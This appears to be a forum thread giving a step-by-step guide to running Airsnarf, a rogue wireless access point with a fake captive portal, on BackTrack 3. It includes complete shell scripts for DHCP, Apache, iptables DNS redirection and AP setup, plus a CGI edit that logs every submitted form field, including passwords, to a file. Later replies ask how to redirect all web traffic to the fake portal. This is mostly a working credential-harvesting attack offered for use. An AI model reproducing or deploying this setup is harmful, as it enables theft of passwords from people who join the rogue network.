Airsnarf working on bt3 with atheros card

[dapirates1]

This guide has been put together from a number of different guides tested on BT3 works great. I am using proxim8470-WD card

1st boot into backtrack 3

make dir in /var/www called html
make a dir in /var/state called dhcp

download dhcp-3.0.5-i486-2.tgz
tar -zxvf dhcp-3.0.5-i486-2.tgz
touch /var/state/dhcp/dhcpd.leases

next open kwrite and make a file called in /etc/rc.d/rc.dhcpd
open file put this in there and save it

#!/bin/sh
#
# /etc/rc.d/rc.dhcpd
#
# Start/stop/restart the Samba SMB file/print server.
#
# To make Samba start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.samba
#

dhcpd_start() {
if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
echo "Starting Dhcp..."
/usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
fi
}

dhcpd_stop() {
killall dhcpd
}

dhcpd_restart() {
dhcpd_stop
sleep 2
dhcpd_start
}

case "$1" in
'start')
dhcpd_start
;;
'stop')
dhcpd_stop
;;
'restart')
dhcpd_restart
;;
*)
# Default is "start", for backwards compatibility with previous
# Slackware versions. This may change to a 'usage' error someday.
dhcpd_start
esac


then create another file in /ect/rc.d/rc.httpd
open the file put this in there then save it

#!/bin/sh
#
# /etc/rc.d/rc.httpd
#
# Start/stop/restart the Apache web server.
#
# To make Apache start automatically at boot, make this
# file executable: chmod 750 /etc/rc.d/rc.httpd
#
conffile=/etc/httpd/httpd.conf

function start() {
if grep -q "^Include /etc/apache/mod_ssl.conf" $conffile ; then
/usr/sbin/apachectl startssl
else
/usr/sbin/apachectl start
fi
}

function stop() {
/usr/sbin/apachectl stop
}

function restart() {
/usr/sbin/apachectl restart
}

# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
*)
echo "usage $0 start|stop|restart" ;;
esac

chmod 755 /etc/rc.d/rc.httpd
chmod 755 /etc/rc.d/rc.dhcpd

goto airsnarf directory /pentest/wireless/airsnarf open airsnarf and replace with this

#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.

echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"
# here are some variables you may want to edit
WWW_ROOT="/var/www/html"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"

# specify another config dir with a command line arg if you want
if [ $1 ]
then
LOCAL_CFG="$1"
fi

source $LOCAL_CFG/airsnarf.cfg

# create the dhcpd.conf
echo -n "Creating dhcpd.conf..."
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."

# copy over the www stuff
echo -n "Building the captive portal..."
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo "Done."

# set our wireless parameters
echo -n "Setting the wireless parameters..."
ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
echo "Done."

# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig $ROGUE_INTERFACE $ROGUE_GW
route add -net 0.0.0.0 gw $ROGUE_GW
echo "Done."

# restart some services
/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
# dammit, I swear this used to work with just an OUTPUT rule...
iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
echo "Done."

# start the local dns resolver
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

now open cfg file in airsnarf folder and edit airsnarf.cfg
replace with

ROGUE_SSID="ap name"
ROGUE_NET="192.168.1."
ROGUE_GW="192.168.1.254"
ROGUE_INTERFACE="ath0"
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE



Now for saving to a file tmp/airsnarf_pwds.txt

open the airsnarf-0.2/cfg/cgi bin edit airsnarf.cgi

comment out(or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);"

replace with

open (MYFILE, '>>/tmp/airsnarf_pwds.txt');
foreach $key (keys(%FORM)) {
print MYFILE "$key = $FORM{$key}\n";
print MYFILE "----------------------\n";
}
;

save file

now run airsnarf and try to connect you will get it works on screen dont worry
goto /var/www/html and copy to /var/www/htdocs Try to connect now from windows box ect then check passwords

[Dr_GrEeN]

Why copy all the files across ???? Just modify

Code:

# here are some variables you may want to edit
WWW_ROOT="/var/www/htdocs"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"

Cheers

[dapirates1]

Thanks for the info Dr_GrEeN, I have done that now i should have noticed that lol

[spankdidly]

Good tut dapirates. I always loved a lil airsnarfin. Well airsnarfin at my house with my equipment.

[coool]

this topic usefull

i will test this after

[skindeep]

Thanks for the info- I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with a RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my atheros chip.

[skindeep]

bump.....................

[dapirates1]

I have made this video Airsnarfing on Backtrack 3 and also uploaded all files needed to rapidshare

http://dapirates1.blip.tv/#650915

I hope it comes in handy to some of you.

[skindeep]

Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer. I've been using the rausb0 device through VMWare. Anyone else in the same boat?

[genderbender]

This is a fantastic guide, I followed it closely and it took awhile but things eventually worked. I have one query though. How do you make all HTML requests go to the gateway address, I got everything working just like yours and when I connect to the rogue AP I'm not diected to anything, just get blank pages, the only page that works is the rogue AP address. Is there anyway to redirect all HTML requests to the local server. This might be an apache thing, I've never been great with apache